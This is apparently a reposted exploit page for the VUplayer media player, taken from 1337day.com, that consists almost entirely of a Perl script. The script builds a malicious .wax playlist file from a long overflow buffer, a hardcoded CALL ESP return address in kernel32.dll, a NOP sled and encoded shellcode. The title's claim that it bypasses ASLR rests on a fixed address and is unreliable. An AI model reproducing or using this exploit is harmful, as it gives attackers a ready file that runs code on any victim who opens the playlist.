Local buffer overflow (.m3u , .pls ,.wax) & bypassi ASLR security
|
来源:1337day.com 作者:DoSs-Dz 发布时间:2012-04-11
|
|
#!/usr/bin/perl ############################################################################ #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0# #0 _ __ __ __ 1# #1 /' \ __ /'__`\ /\ \__ /'__`\ 0# #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1# #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0# #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1# #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0# #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1# #1 \ \____/ >> Exploit database separated by exploit 0# #0 \/___/ type (local, remote, DoS, etc.) 1# #1 1# #0 [»] Site : 1337day.com 0# #1 [»] Support e-mail : submit[@]1337day.com 1# #0 0# #1 +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ 1# #0 |I'm DoSs-Dz Member From Inj3ct0r Team | 1# #1 +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ 0# #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1# #[»] BIGG THANKS TO : Inj3ct0r Team & isecuri1y.org & Dz4all.com ############################################################################ #---------------------------------------------------------------------------# #[»] author : Khaled-Ham #[»] Prog Victim : VUplayer last version #[»] Title : Local buffer overflow (.m3u , .pls ,.wax) & bypassi ASLR security #[»] Date : 08/04/2012 #[»] Greatz : nO Greats xD :) = robert , lazhar , hakou , gaiare ...! #---------------------------------------------------------------------------# my $bof="\x41" x 1012; my $ret="\x5D\x38\x82\x7C"; # 7C82385D FFD4 CALL ESP kernel32.dll my $nop="\x90" x 20, my $shellcode= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". "\x42\x30\x42\x30\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x47". "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58". "\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38". "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x58". "\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54". "\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x48". "\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43". "\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x47". "\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x57\x4e\x51\x4d\x4a". "\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b". "\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x43\x4f\x45\x41\x53". "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37". "\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x56\x4a\x59". "\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36". "\x4e\x36\x43\x36\x42\x50\x5a"; open(myfile,'>>dz.wax'); print myfile $bof.$ret.$nop.$shellcode; close(myfile);
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|